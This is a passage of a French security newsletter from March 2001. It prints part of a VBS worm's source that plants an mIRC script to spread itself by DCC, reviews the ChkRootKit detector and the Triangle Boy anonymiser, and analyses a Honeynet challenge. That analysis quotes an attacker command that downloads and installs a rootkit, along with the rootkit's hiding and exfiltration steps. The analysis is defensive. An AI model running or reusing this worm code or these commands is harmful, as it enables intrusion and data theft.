T3JO3787 = "c:\mirc"
ElseIf T80563H8.fileexists("c:\mirc32\mirc.ini") Then
T3JO3787 = "c:\mirc32"
ElseIf T80563H8.fileexists(L2168MPK & "\mirc\mirc.ini") Then
T3JO3787 = L2168MPK & "\mirc"
ElseIf T80563H8.fileexists(L2168MPK & "\mirc32\mirc.ini") Then
T3JO3787 = L2168MPK & "\mirc"
Else
T3JO3787 = ""
End If
End If
If T3JO3787 <> "" Then
Set I986TV5R = T80563H8.CreateTextFile(T3JO3787 & "\script.ini", True)
I986TV5R = "[script]" & vbCrLf & "n0=on 1:JOIN:#:{"
I986TV5R = I986TV5R & vbCrLf & "n0=on 1:JOIN:#:{"
I986TV5R = I986TV5R & vbCrLf & "n1= /if ( $nick == $me ) { halt }"
I986TV5R = I986TV5R & vbCrLf & "n2= /." & Chr(100) & Chr(99) & Chr(99) & " send $nick "
I986TV5R = I986TV5R & ON693784
I986TV5R = I986TV5R & vbCrLf & "n3=}"
script.Close
End If
End Function
'Vbswg 2 Beta. By [K]
Le fonctionnement du virus généré est très classique:
1. Transmission du code dans un fichier attaché à un courrier à l'ensemble des adresses contenu dans le carnet
d'adresse. Selon les options utilisées dans le générateur, et la configuration du client de messagerie des
destinataires, le code attaché peut être exécuté sur ouverture explicite de l'attachement ou simple visualisation du
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 44/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
corps du message. Le nom 'attachments' est lui-même masqué (cf [1]),
Réplication du code via la fonction DCC send si l'application mIrc est présente. Le nom 'dcc' est lui aussi masqué
(cf [2]),
3. Ecrasement du contenu des fichiers ayant pour extension 'vbe' ou 'vbs' par le code du virus, un parcours exhaustif
de tous les volumes (y compris les partages réseau) étant effectué.
Est-il utile de rappeler, après une telle démonstration, la nécessité d'installer - et de maintenir à jour - sur tous les
postes et points critiques du système d'information des dispositifs de détection et d'éradication tels qu'anti-virus ou
sondes d'analyse de signature ?
* Au risque d'aller à l'encontre des définitions actuellement usités, nous considérons qu'un 'vers' / 'worm' est un code autonome et
2.
susceptible de se déplacer par ses propres moyens sans requérir l'intervention d'un utilisateur. Les codes dont il est question ici
nécessitent une action préalable de l'utilisateur. Mais tout ceci n'est qu'une affaire de convention …
Complément d'information
http://vx.netlux.org/dat/vct.shtml
http://vx.netlux.org/dat/tv07.shtml
http://www.securax.org/data/vbswg150b.zip
http://www.kvirii.com.ar/
CHKROOTKIT
Description
'ChkRootKit' est un utilitaire destiné à contrôler l'absence (ou la présence !) d'un 'rootkit' sur un système UNIX.
Avant de détailler le fonctionnement de cet utilitaire, il peut être utile de donner notre définition du 'rootkit' et d'en
rappeler la genèse:
Un 'rootkit' est une collection, organisée et prête à l'emploi, d'utilitaires permettant d'ouvrir, et de
conserver, un accès masqué sur un compte unix disposant de privilèges étendus, ceux de 'root' en général.
Bien que les techniques élémentaires de dissimulation et de masquages utilisées dans les 'rootkits' aient fait l'objet
de multiples articles publiés dés 1986, le terme 'rootkit' n'est réellement apparu qu'au milieu des années 90.
Jusqu'alors, les pirates disposaient de leurs propres boites à outils laborieusement assemblées et jalousement
défendues. En effet, rares étaient les systèmes d'exploitation accessibles à tout un chacun en dehors des systèmes de
type BSD et dérivés - SunOS par exemple - dont les sources étaient assez facilement disponibles dans le milieux
universitaire. Ainsi, les premiers composants des futurs 'rootkits' firent leur apparition en environnement BSD4.x
puis SunOS.
Citons à titre d'exemple, les deux articles de fond publiés dans le célèbre magazine 'PHRACK':
Unix Cracking Tips (Phrack Vol. 3 / Num. 25 / Art. 5 en date du 17 Mars 1989) ou comment manipuler le
noyaux UNIX afin de détourner, voire d'ajouter, certains appels systèmes en environnement BSD.
Hidding Out Under UNIX (Phrack Vol. 3 / Num. 25 / Art. 6 en date du 25 Mars 1989) ou comment manipuler le
contenu du fichier /etc/utmp en environnement BSD et Systeme V afin de masquer toute trace des connexions
console.
Il est possible d'affirmer, avec le recul, que le numéro 25 de PHRACK Magazine marque l'apparition (pour ne pas
dire "est à l'origine") d'une nouvelle ère en dévoilant des techniques de manipulations performantes, et jusqu'alors
totalement confidentielles, auprès d'un large public (pour l'époque).
Il faudra cependant attendre encore cinq ans, et l'article 'The Fingerd Trojan' (Phrack Vol. 5 / Num. 46 / Art. 1 en
date du 20 Septembre 1994), pour voir apparaître la technique consistant à modifier - patcher - les sources d'un
service, ici 'finger', dans l'optique de lui adjoindre une porte dérobée.
Tous les éléments sont alors réunis pour favoriser l'éclosion de boites à outils prêtes à l'emploi:
- les techniques élémentaires sont désormais connues, les composants logiciels sont développés sous la forme de
modules facilement adaptables grâce aux outils GNU,
- un réseau de communication dénommé Internet ouvert et performant est désormais accessible qui autorise non
seulement l'échange de données mais aussi l'ouverture programmable de connexions en temps réel,
- les sources de systèmes d'exploitation 'universitaires' sont accessibles à tous, SUN annonce la mise à disposition
gracieuse de la version X86 de son nouveau système Solaris, Linus Torvald relève le défi de créer un système
d'exploitation totalement libre: LINUX.
Le résultat ne se fait pas attendre, entre 1995 et 2001, plus de trente paquetages de type 'rootkit' sont diffusés et
fonctionnels en majorité dans l'environnement LINUX mais aussi sous Solaris et FreeBSD.
En 1996, un paquetage réunissant toutes les caractéristiques attendues d'un 'rootkit' est rendu publique. Ce
paquetage dénommé 'LRK V3' - pour Linux Root Kit - fera l'objet de trois évolutions successives, la version 'LRK
V5' publiée fin 1999 atteignant un degré de sophistication rarement atteint: 18 utilitaires classiques modifiés - dont
chfn, chsh, du, find, ifconfig, inetd, killall, login, netstat, passwd, pidof, ps, rshd, syslogd, tcpd et top - et 6
outils spécifiques.
En 1997, deux articles détaillant une technique de manipulation dynamique des librairies partagées sont publiés dans
PHRACK sous les titres évocateurs de 'Shared Library Redirection' (Phrack Vol. 7 / Num. 51 / Art. 8 en date du 01
Septembre 1989) et 'Bypassing Integrity Checking Systems' (Phrack Vol. 7 / Num. 25 / Art. 9 en date du 01
Septembre 1989).
Combiné avec le mécanisme de chargement des modules, présents notamment en environnement Solaris et Linux,
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 45/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
cette technique autorise la création d'un nouveau type de 'rootkit' plus efficace dans lequel la fonction de
dissimulation est codée au niveau du noyau, et non plus dans chaque utilitaire.
En 1999, un nouvel article de Phrack, 'A *REAL* NT Rootkit, patching the NT Kernel' (Phrack Vol. 9 / Num. 55 /
Art. 5 en date du 09 Septembre 1999), détaille la technique permettant de manipuler le noyau du système
d'exploitation NT afin d'y installer un 'rootkit'.
Enfin, à la veille du passage en l'an 2000, l'existence des 'rootkits' est enfin dévoilée au grand public par un article
de Dave Dittrich, un universitaire collaborant à l'initiative de sécurité mise en place par le SANS. Depuis, plusieurs
autres paquetages aussi performants que le 'LRK' ont été diffusés dont notamment 't0rnKit' et 'adore' …
La version actuelle de l'utilitaire 'ChkRootKit' autorise la détection des six principaux 'rootkits' dans leur forme
originale:
1. LRK (3, 4 et 5)
2. Solaris Rootkit
3. FreeBSD Rootkit
4. T0rn
5. ARK (Ambient Rootkit)
6. Ramen (cf notre rapport de veille N°30 du mois de Janvier)
La technique d'analyse employée bien que triviale donnera de d'excellents résultats sur les distributions non
modifiées. Elle consiste à:
- rechercher une signature de la présence d'un 'rootkit' dans les utilitaires connus pour être modifiés,
- tester la présence d'un shell interactif sur les ports TCP/31337, TCP/511, TCP/47017, TCP/27374
- contrôler le mode de fonctionnement de l'adaptateur réseau
- vérifier l'absence de manipulation des fichiers lastlog et wtmp.
Notons cependant que les sources des 'rootkit' testés étant toutes accessibles, la modification des signatures
spécifiques des différents utilitaires sera aisée mettant en défaut les résultats de l'analyse effectuée par
'ChkRootKit'.
Ainsi, et à titre d'exemple, le 'rootkit' LRK utilise les fichiers /dev/ptyp, /dev/ptyq, /dev/ptyr et /dev/ptrys
pour stocker les paramètres de configuration et de fonctionnement. L'utilitaire 'ChkRootKit' recherche donc la
présence de l'une de ces chaînes dans les exécutables distribués avec ce rootkit au moyen de l'expression régulière
'/dev/pty[pqrs]', la signature du 'rootkit' LRK. En pratique, les noms de ces fichiers étant définis dans le fichier de
configuration 'rootkit.h' (constantes ROOTKIT_PROCESS_FILE, ROOTKIT_ADDRESS_FILE, ROOTKIT_FILES_FILE et
ROOTKIT_FILES_FILE), une simple recompilation de la distribution avec d'autres valeurs permet d'échapper à la
détection.
Bien qu'imparfait, l'utilitaire 'ChkRootKit' a le mérite d'exister. Il vient en complément d'un outil de signature, tel
TripWire, dont l'utilité n'est plus à rappeler.
Attention cependant, certains 'rootkits' tel Knark s'installent en tant que modules du noyau UNIX (LKM) et
détournent les appels systèmes. Ils peuvent ainsi éviter la détection de modification en masquant les altérations lors
d'un appel système 'normal'. Notons que ces techniques sont utilisées depuis longtemps par les Virus dits 'Stealth'.
'ChkRootKit' fonctionne dans environnements LINUX 2.0.x, 2.2.x, FreeBSD 2.2.x, 3.x et 4.0, OpenBSD 2.6, 2.7 et
2.8, Solaris 2.5.1, 2.6 et 8.0.
Complément d’information
http://www.chkrootkit.org/
http://packetstorm.securify.com/UNIX/penetration/rootkits/
TRIANGLE BOY DEVOILE
Description
Notre rapport précédent annonçait la prochaine mise à disposition d'un utilitaire permettant de masquer totalement
l'origine des connexions WEB et de contourner le filtrage d'accès à certains 'anonymiseurs WEB' dont SafeWeb.
Triangle Boy est désormais disponible gratuitement en version 'béta', version ne fonctionnant actuellement qu'en
environnement LINUX.
L'architecture de cet utilitaire largement détaillée sur le site de l'éditeur SAFEWEB est étonnante. Le mécanisme de
contournement des dispositifs de filtrage/blocage d'URL proposé risque de poser, à terme, de sérieux problèmes de
sécurité.
Comme nous l'avions supposé, l'architecture Triangle Boy - ou Tboy - s'appuie sur un mécanisme de tunnel SSL
(dissimulation du contenu) et un premier relayage assuré par un système tiers (masquage de la cible réelle).
La réelle nouveauté consiste en l'utilisation d'un second système de relayage - le troisième larron si l'on compte le
système source - exécutant l'utilitaire Triangle Boy.
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 46/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
Un flux de donnée triangulaire peut ainsi
être établi qui autorise une différentiation
Poste
Poste
Client
Client
entre le chemin emprunté par la requête et
celui emprunté par la réponse.
Ici, le relais Tboy n'assure qu'une simple
fonction de retransmission de la requête
Dispositif
Dispositif
émise par le demandeur vers la passerelle
Filtrage
Filtrage
SafeWEB.
Requête
Réponse
La réponse est, elle, directement transmise
(SSL)
(SSL)
Accès
Accès
par la passerelle SafeWeb vers le
Direct
Anonyme
1
4
demandeur en usurpant l'adresse IP du dit
2
relais.
3
Celui-ci se comporte comme un simple
Passerelle
Passerelle
Relais
Relais
SAFEWEB
SAFEWEB
TBoy
TBoy
réflecteur de paquet n'ayant aucune
Requête
possibilité d'analyser le flux chiffré SSL,
Info TCP
l'établissement SSL étant réalisé de bout en
Requète
bout.
Réponse
Notons que l'usurpation d'une adresse IP
nécessite, dans le cas d'une session TCP, la
connaissance de certains paramètres numéro de séquence notamment - par la
Serveur
Serveur
passerelle SafeWEB. Ces données sont
WEB
WEB
transmises par le relais Tboy lors du
relayage de la requête.
L'infrastructure proposée permet ainsi non seulement de garantir l'anonymat total mais aussi de contourner tout
dispositif destiné à bloquer l'accès vers SafeWEB (ou tout proxy public moyennant adaptation).
L'adresse de l'anonymiseur n'est en effet jamais transportée
dans les demandes de connexion.
L'utilisation du protocole SSL de bout en bout, c'est à dire
entre le poste client et la passerelle SafeWEB permet de
garantir la confidentialité des échanges vis à vis du relais
Tboy pourtant positionné en coupure.
Un effet de bord doit cependant être noté qui a pour origine
la connexion sur un site différent de celui contenu dans le
certificat présenté par la passerelle SafeWEB. L'utilisateur
doit alors explicitement accepter le certificat après avoir
soigneusement examiné celui-ci.
Une attaque de type 'man in-the-middle' pourrait ainsi être
montée avec la complicité du propriétaire du relais en
présentant le certificat d'un autre relais. Cependant cette
attaque n'ira pas très loin du fait même de la dissymétrie des
échanges.
Il est fort probable que nous assistions à une floraison de
relais Tboy durant le prochain printemps d'autant que
SafeWEB annonce la publication prochaine d'un annuaire
des relais Tboy disponibles dans le monde. Trois relais Tboy
sont d'ors et déjà actifs.
La parade consistant à filtrer les relais TBoy semble vouée à
l'échec. Si la mise en place d'un anonymiseur nécessite de
coûteuses ressources, l'installation d'un relais Triangle Boy
est effectuée en moins d'une minute et ne requiert qu'une
machine de très faible puissance.
Sur le plan pratique, la distribution Triangle Boy est livrée
sous la forme d'une archive tarball contenant les sources 'C'
ainsi que la distribution de la librairie d'accès réseau
'libpcap' (version 0.6.2) nécessaire à la manipulation des
paquets IP.
L'utilisation des classiques outils d'auto-configuration GNU
autorise la compilation et l'installation immédiate de la
distribution sur le système relais.
Une rapide inspection des sources met en évidence un
codage de qualité et ne révèle aucun indice de manipulation.
Rappelons cependant que la CIA possède une participation
indirecte dans la société SafeWEB.
Avant d'être déclaré saine, la distribution Triangle Boy
devra faire l'objet d'une analyse approfondie.
Notons à ce sujet, que la distribution actuelle ne contient que la partie 'cliente' nécessaire au relayage et à la
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 47/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
connexion sur la passerelle SafeWEB. La mise en place d'un architecture similaire mais utilisant une passerelle
nécessite de disposer des spécifications du protocole client/serveur ou au moins du code de la partie 'serveur'.
Complément d'information
http://www.saveweb.com/webpage/tboy1.php3
TECHNIQUES
LUCKROOT - HONEYNET SCAN OF THE MONTH
Description
Nous proposons ici un travail pratique d'analyse d'une attaque, travail basé sur le challenge 'Scan Of The Month' du
mois de Mars 2001. A la date de parution de ce rapport, ce challenge sera clos et le lecteur pourra vérifier la validité
de notre analyse !
Le challenge Scan Of The Month' consiste à analyser les traces d'une attaque réelle et à répondre aux 5 questions
suivantes:
1. What is the blackhat attempting to do with his command line syntax?
2. What does the tool accomplish?
3. How does the tool work?
4. Is this tool a worm, or would you classify it as something else?
5. Is this tool original, or is it simply based on previous tools?
If based on previous tools, which ones and what is modified?
6. Bonus Question: What information can you obtain about who is using or created the tool?
Le point de départ du challenge prend la forme d'un extrait du journal de sécurité d'un système piégé (honey pot):
Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail
Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail
Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y
Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L
Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot
Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200
Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200
Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1
Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10
Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120
Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1
Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1
Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1
Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128
Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1
Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20
L'analyse rapide de cet extrait de journal nous conduit à immédiatement aller chercher le paquetage LUCKROOT.TAR
afin de l'étudier en détail. En effet, l'attaquant après avoir pris le contrôle du système piégé charge ce paquetage
depuis le site 'www.becsys.org' en utilisant le navigateur WEB 'lynx'. L'étude de la commande 'luckgo' nous
permettra de comprendre la raison d'être de la série de commandes journalisées.
Notons que l'attaquant rencontre quelques difficultés avant d'arriver à installer le paquetage dans le répertoire
'/usr/sbin/.mail'. A ce propos, les séquences initiales de l'attaque ne nous sont pas fournies. En effet, le répertoire
'.mail' n'existant pas sur un système 'RedHat', l'attaquant a préalablement dû créer celui-ci, action que les extraits
fournis ne détaillent pas. Nous ignorons par ailleurs la technique utilisée pour prendre le contrôle de ce système,
utilisé comme relais.
Analyse de 'luckroot.tar'
Il s'agit en réalité d'une archive tarball dont l'extension devrait être '.tar.z' ou 'tgz' contenant 5 fichiers:
luckstatdx.c: Les sources C d'un code d'exploitation de la vulnérabilité rpc.statd, code dédié RedHat
luckscan-a.c: Les sources C d'un scanner de classe A dédié à la recherche des services rpc.statd actifs
luckstatdx:
La version compilée du code 'luckstatdx.c' au format ELF RedHat
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 48/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
luckscan-a:
La version compilée du code 'luckscan.c' au format ELF RedHat
luckgo:
Un script d'interface assurant la compilation et l'activation du scanner, du code d'attaque, et si
tout se passe 'bien', l'installation d'un 'root-kit'.
La lecture attentive du code source 'luckscan-a.c' met en évidence un programme trivial de balayage de toutes les
adresses IP d'une classe A au moyen de trois boucles imbriquées. Le port cible ainsi que les trois premiers blocs (A,
B et C) de l'adresse sont paramétrables.
Le programme d'attaque 'luckstadx' est activé dès qu'un service rpc.statd actif est découvert. Notons qu'aucune
validation n'est préalablement effectuée sur la cible de l'attaque bien que le programme d'attaque soit exécuté avec
l'option '-d 0' spécifiant une cible RedHat 6.2. Le taux d'efficacité de l'attaque en sera d'autant diminué !
Le principe de fonctionnement du programme d'attaque est dévoilé par l'analyse du source 'luckstadx.c':
1. Un paquet UDP contenant un shellcode dédié est transmis sur le service rpc.statd
2. Le shellcode est exécuté sur le système distant à la suite de l'écrasement de la pile du service rpc.statd
3. Celui-ci ouvre un service offrant un shell interactif avec les privilèges 'root' sur le port 39168/TCP
4. Une connexion est alors effectuée depuis le poste de l'attaquant vers ce shell interactif
5. Une séquence de commande est transmise qui permet de rapatrier et d'installer un rootkit depuis un site distant
A partir de ce moment, le système distant doit être considéré comme totalement compromis et nécessitant un
réinstallation complète à partir de supports dont l'intégrité est garantie (attention à ne pas réinstaller une
sauvegarde postérieure à la date de compromission du système).
La commande codée dans source 'luckstadx.c' nous révèle que le 'rootkit' est chargé depuis un site WEB distant :
cd /;uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd
lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n
Ce ' rootkit ' - prononcer exhibit - est bien évidemment
immédiatement téléchargé par nos soins pour analyse
complémentaire. Notons au passage que le dit site accueille le
visiteur par une page ne contenant rien d'autre qu'une
animation 'Macromedia Flash'. Celle-ci ne permet pas
d'identifier le site ou son contenu.
Notre attention a immédiatement été attirée par le message
d'avertissement de notre navigateur (toujours paramétré en
mode 'paranoïaque' ) demandant l'autorisation d'exécution
d'un objet 'Flash'.
En effet, un bulletin d'alerte a été publié début Janvier
2001 portant sur une vulnérabilité présente dans le plugin
Macromedia. Une rapide inspection du contenu du fichier
'becys.swf' ne fait apparaître aucune manipulation malicieuse
du code flash.
En toute logique, l'exploration détaillée de ce site devrait s'avérer fructueuse mais elle nécessite de disposer d'un
point d'entrée dans l'arborescence logique de ce serveur Apache …
Le script 'luckgo' est utilisé de façon intensive par l'attaquant pour sonder plusieurs blocs - dont certains 2 fois de
suite - de classe B soit 65534 adresses possibles: ./luckgo 216 210 pour la classe 216.210.x.x. Le résultat de
l'analyse* de l'utilisation de ce script est présenté dans le tableau suivant qui met en évidence la cible principale du
l'attaquant: les fournisseurs d'accès Américain.
Plage
N Durée (s)
Commentaire
Class.
12.20.x.x
1
NA
US AT&T
[Bloc complet]
FAI
A
24.1.x.x
1
745
US @Home Network
[Bloc complet]
FAI
A
63.1.x.x
1
40
US UUNET
[Bloc complet]
FAI
A
64.1.x.x
1
31
US Concentric Network Corporation
[Bloc complet]
FAI
A
64.120.x.x
1
17
US Teligent Inc
[Bloc complet]
FAI
A
194.1.x.x
1
72
SL TAXNET (Network of the Slovak Tax Offices)
[Bloc Partiel ]
PRI
C
200.120.x.x
2
36 - 49
Inconnu
C
210.120.x.x
1
59
KR BORANET
[Bloc complet]
FAI
C
210.128.x.x
1
677
JP
Japan Network Information Center
[Bloc complet]
FAI
C
216.1.x.x
2
80 - 127
US Business Internet, Inc. [Bloc complet]
FAI
C
216.10.x.x
1
598
US 21 sociétés diverses
PRI
C
216.200.x.x
2 6
- 151
US Abovenet Communications, Inc.
[Bloc complet]
FAI
C
216.210.x.x
1
114
CA TotalNet, Inc
[Bloc complet]
FAI
C
* Ces données peuvent n'avoir aucun fondement car susceptibles d'avoir été modifiées/masquées avant publication du challenge
Analyse xzibit.tar.gz
Il s'agit d'une archive tarball (format tgz. ou tar.gz) contenant les fichiers présentés en suivant et ici regroupés par
catégorie. La plupart de ces fichiers sont des exécutables dont les sources ne sont pas livrées. Un travail de rétroanalyse est donc nécessaire pour déterminer la fonctionnalité du programme sans avoir à exécuter celui-ci. Pour
notre part, l'expérience, un moteur de recherche performant et un bon éditeur hexadécimal suffisent à déterminer
sans ambiguïté les fonctionnalités du code. Une exécution en environnement contraint permettra, si nécessaire, de
lever certains doutes.
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 49/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
install:
Le fichier script d'installation du 'rootkit'. Sa
lecture dévoile le fonctionnement du 'rootkit'.
becsys.cgi:
Un cgi-bin compilé pour l'environnement RedHat
offrant l'interface de commande présenté ci-contre
linsniffer:
Un mini sniffer réseau attaché à l'interface 'eth0'
journalisant les paquets dans le fichier 'tcp.log'.
Cet outil disponible en source est l'un des préférés
des pirates pour sa très faible taille.
logclear:
Le script de lancement du sniffer 'linsniffer'
sense:
Un script assurant l'extraction des mots de passe à
partir des données journalisées par 'linsniffer'
sl2:
Un programme réseau peu documenté dont
l'analyse statique laisse supposer qu'il s'agit d'un
outil de saturation de type 'flooder'.
sshdu:
Un service d'accès SSH modifié utilisant le fichier de configuration 's' et actif sur le port déclaré
dans celui-ci, soit TCP/6969.
s:
Le fichier de configuration SSH associé (normalement dénommé sshd_config). Les fichiers de
paramétrage sont localisés sous le répertoire '/dev/ida/.inet'.
ssh_host_key:
Fichier protégé par un mot de passe - hélas inconnu - contenant la clef privée du service
SSH ainsi qu'un commentaire.
ssh_random_seed:
Fichier de configuration du service SSH utilisé pour l'initialisation du générateur d'aléa.
hdparm:
Un script chargé d'initialiser en arrière plan l'utilitaire d'analyse réseau 'linsniffer' et la porte
dérobée 'sshdu'.
ifconfig:
Une commande 'ifconfig' modifiée pour masquer l'activité de 'linsniffer' (interface eth0 en mode
promiscuous)
netstat:
Une commande 'netstat' modifiée pour ne pas faire apparaître les connexions établis par/avec les
adresses contenues dans le fichier /dev/caca
ps:
Une commande 'ps' modifiée pour masquer les processus dont le nom est présent dans le fichier
/dev/dsx
top:
Une commande 'top' modifiée pour masquer les processus dont le nom est présent dans le fichier
/dev/dsx
Le principe de fonctionnement du rootkit est dévoilé par l'analyse du script 'install':
1. Remplacement des exécutables 'ifconfig', 'netstat', 'ps', 'top' par les versions altérées. Les versions originales
sont détruites.
2. Création du fichier '/dev/dsx' contenant la liste des exécutables ne devant pas être rendus visibles: 'sl2',
'sshdu', 'linsniffer' , 'smurf', 'slice', 'mech', 'bnc', 'psybync'.
3. Création du fichier '/dev/caca' contenant les caractéristiques des connexions devant être masquées: blocs
d'adresses IP 193.231.139, 213.154.137, 193.254.34, services: 6969, 3666, 31221, 22546, ports sources:
6969, 2222.
4. Création du répertoire masqué '/dev/ida/.net' et copie des différents utilitaires 'linsniffer', 'sense', 'sl2',
'sshdu', 's' , …
5. Copie d'une version altérée de l'utilitaire 'hdparm' dans le répertoire '/usr/bin' puis modification du fichier
d'initialisation système '/etc/rc.d/rc.sysinit' conduisant à exécuter le script 'hdparm' lors de chaque
démarrage du système.
6. Recherche la présence d'un serveur WEB de type apache et copie de l'interface de commande 'becys.cgi' dans le
répertoire 'cgi-bin' associé.
7. Collecte des informations systèmes via les commandes 'ifconfig' (paramètres d'accès réseau), 'hostname' (nom
complet du système), 'uname' (identité du noyau) et transmission de ces données par mail vers l'adresse
'[email protected]'.
8. Destruction du répertoire 'lamerk' et de l'archive 'xzibit.tar.gz'.
L'analyse du script d'installation permet d'avancer dans l'analyse. La liste présente dans '/dev/dsx' n'est pas
cohérente avec la distribution contenue dans le 'rootkit' étudié. Par ailleurs, une recherche approfondie portant sur
les caractéristiques de ce 'rootkit' ne retourne que deux références, la première datant du 27 Décembre 2000, la
seconde du 31 Janvier 2001. Ces deux références mentionnent un paquetage dénommé 'srk.tar.gz' et non
'xzibit.tar.gz'. Il semble donc que ce paquetage résulte d'un adaptation du paquetage 'srk.tar.gz' lui-même
probablement dérivé du 'célèbre' lrk4 de Lord Somer. Notons qu'il s'agit ici d'une adaptation rapide et imparfaite
comme le prouve l'absence du fichier source de l'utilitaire 'sl2', fichier pourtant référencé dans le script d'installation,
mais aussi l'existence d'une erreur de programmation: la commande de destruction du paquetage est activée deux
fois: dans le script 'install' et dans l'utilitaire 'luckstadx'.
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 50/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
L'étude des blocs d'adresses n'apporte hélas guère d'informations complémentaires, ces blocs étant issus d'un
découpage de classes partiellement allouées à 'The Romanian Education Network', 'Royston Automotive Ltd' et
'OnLine Finance'. Notons simplement la présence d'une entité localisée en Roumanie, contrée actuellement très
actif dans le domaine des attaques réseaux.
Conclusion
Les informations collectées lors de cette analyse, purement statique rappelons-le, permettent de répondre point par
point aux questions posées par le challenge 'Scan Of The Month' du mois de Mars. La mise en place d'un piège à
mouche - ou Honey Pot - permettant d'étudier plus en détail et de manière dynamique le comportement de
l'attaquant, peut même être envisagée.
Il suffit pour cela de simuler l'exécution du script ' install ' et d'envoyer un courrier à l'adresse '[email protected]'
ayant pour sujet 'becys rewting', contenant le résultat des commandes '/sbin/ifconfig | grep inet', 'hostname -f'
et 'uname -a'. Bien entendu, le nom de domaine et l'adresse IP devront pointer sur le système piégé.
Complément d’information
http://project.honeynet.org/scans/scan13/
Veille Technologique Sécurité N°32
© APOGEE Communications - Tous droits réservés
Page 51/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE

Documents pareils

Veille Technologique Sécurité

Veille Technologique Sécurité Site susceptible d’héberger des informations ou des programmes dont l’utilisation est répréhensible au titre de la Loi Française.

Plus en détail